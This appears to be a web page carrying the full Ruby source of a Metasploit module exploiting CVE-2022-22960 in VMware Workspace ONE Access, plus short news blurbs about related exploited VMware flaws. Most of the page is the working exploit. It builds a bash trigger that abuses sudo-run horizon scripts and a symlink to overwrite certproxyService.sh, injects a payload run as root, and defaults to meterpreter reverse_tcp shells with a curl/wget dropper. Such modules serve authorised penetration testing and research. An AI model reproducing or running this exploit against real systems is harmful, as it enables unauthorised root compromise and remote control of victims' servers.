Headline
VMware Workspace ONE Access Privilege Escalation
This Metasploit module exploits CVE-2022-22960 which allows the user to overwrite the permissions of the certproxyService.sh script so that it can be modified by the horizon user. This allows a local attacker with the uid 1001 to escalate their privileges to root access.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Unix include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck TARGET_FILE = '/opt/vmware/certproxy/bin/certproxyService.sh'.freeze def initialize(info = {}) super( update_info( info, { 'Name' => 'VMware Workspace ONE Access CVE-2022-22960', 'Description' => %q{ This module exploits CVE-2022-22960 which allows the user to overwrite the permissions of the certproxyService.sh script so that it can be modified by the horizon user. This allows a local attacker with the uid 1001 to escalate their privileges to root access. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me', # Discovery & PoC 'jheysel-r7' # Metasploit Module ], 'Platform' => [ 'linux', 'unix' ], 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => %i[curl wget], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'Privileged' => true, 'DefaultTarget' => 0, 'References' => [ [ 'CVE', '2022-22960' ], ['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'], ['URL', 'https://github.com/sourceincite/hekate/'], ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'] ], 'DisclosureDate' => '2022-04-06', 'Notes' => { # We're corrupting certproxyService.sh, if restoring the contents fails it won't work. 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] } } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def lpe_trigger(execute_payload) cert_filename = Rex::Text.rand_text_alpha(4..12) file_contents = <<~EOF #!/bin/bash cp #{TARGET_FILE} #{datastore['WritableDir']}/#{@certproxy_backup} sudo /usr/local/horizon/scripts/publishCaCert.hzn #{TARGET_FILE} #{cert_filename} mkdir #{cert_filename} ln -s #{TARGET_FILE} #{cert_filename}/debugConfig.txt sudo /usr/local/horizon/scripts/gatherConfig.hzn #{cert_filename} rm -rf #{cert_filename} chmod 755 #{TARGET_FILE} echo "mv /etc/ssl/certs/#{cert_filename} #{TARGET_FILE}" > #{TARGET_FILE} echo "chown root:root #{TARGET_FILE}" >> #{TARGET_FILE} echo "chmod 640 #{TARGET_FILE}" >> #{TARGET_FILE} echo "#{execute_payload}" >> #{TARGET_FILE} echo "mv #{datastore['WritableDir']}/#{@certproxy_backup} #{TARGET_FILE} && chmod 500 #{TARGET_FILE} && chown root:root #{TARGET_FILE}" >> #{TARGET_FILE}#{' '} sudo #{TARGET_FILE} EOF file_contents end def check unless whoami == 'horizon' return CheckCode::Safe('Not running as the horizon user.') end test = cmd_exec("sudo #{TARGET_FILE}") unless test.include? 'basename: missing operand' CheckCode::Safe end CheckCode::Appears('vulnerable') end def exploit @certproxy_backup = Rex::Text.rand_text_alpha(4..12) payload_filename = Rex::Text.rand_text_alpha(4..12) + '.sh' trigger_filename = Rex::Text.rand_text_alpha(4..12) + '.sh' case target['Type'] when :unix_cmd execute_payload = payload.encoded when :linux_dropper payload_path = "#{datastore['WritableDir']}/#{payload_filename}" upload_and_chmodx(payload_path, generate_payload_exe) execute_payload = "#{datastore['WritableDir']}/#{payload_filename}" register_file_for_cleanup(payload_path) else fail_with(Failure::BadConfig, 'Invalid target specified') end lpe_trigger_data = lpe_trigger(execute_payload) upload_and_chmodx("#{datastore['WritableDir']}/#{trigger_filename}", lpe_trigger_data) register_file_for_cleanup("#{datastore['WritableDir']}/#{trigger_filename}") print_status('Triggering the payload...') cmd_exec("cd #{datastore['WritableDir']}; ./#{trigger_filename}") endendRelated news
Categories: Exploits and vulnerabilities Categories: News Tags: Zoho ManageEngine Tags: CVE-2021-40539 Tags: Log4Shell Tags: CVE-2021-44228 Tags: CVE-2021-13379 Tags: ProxyShell Tags: CVE-2021-34473 Tags: CVE-2021-31207 Tags: CVE-2021-34523 Tags: CVE-2021-26084 Tags: Atlassian Tags: CVE-2022-22954 Tags: CVE-2022-22960 Tags: CVE-2022-26134 Tags: CVE-2022-1388 Tags: CVE-2022-30190 Tags: Follina What can the routinely exploited vulnerabilities of 2022 tell us, and what do we think will make it on to next year's list? (Read more...) The post 2022's most routinely exploited vulnerabilities—history repeats appeared first on Malwarebytes Labs.
A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five
This Metasploit module combines two vulnerabilities in order achieve remote code execution in the context of the horizon user. The first vulnerability, CVE-2022-22956, is an authentication bypass in OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the authentication mechanism and execute any operation. The second vulnerability, CVE-2022-22957, is a JDBC injection remote code execution vulnerability specifically in the DBConnectionCheckController class's dbCheck method which allows an attacker to deserialize arbitrary Java objects which can allow for remote code execution.
CISA orders US federal agencies to implement patches ASAP
CISA has issued severe warnings about disclosed vulnerabilities in VMWare products that are actively being exploited, probably by APT threat actors. The post VMWare vulnerabilities are actively being exploited, CISA warns appeared first on Malwarebytes Labs.
VMware has issued patches to contain two security flaws impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks. The first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior
Researchers say a GitHub proof-of-concept exploitation of recently announced VMware bugs is being abused by hackers in the wild.
A critical VMware bug tracked as CVE-2022-22954 continues to draw cybercriminal moths to its remote code-execution flame, with recent attacks focused on botnets and Log4Shell.
VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.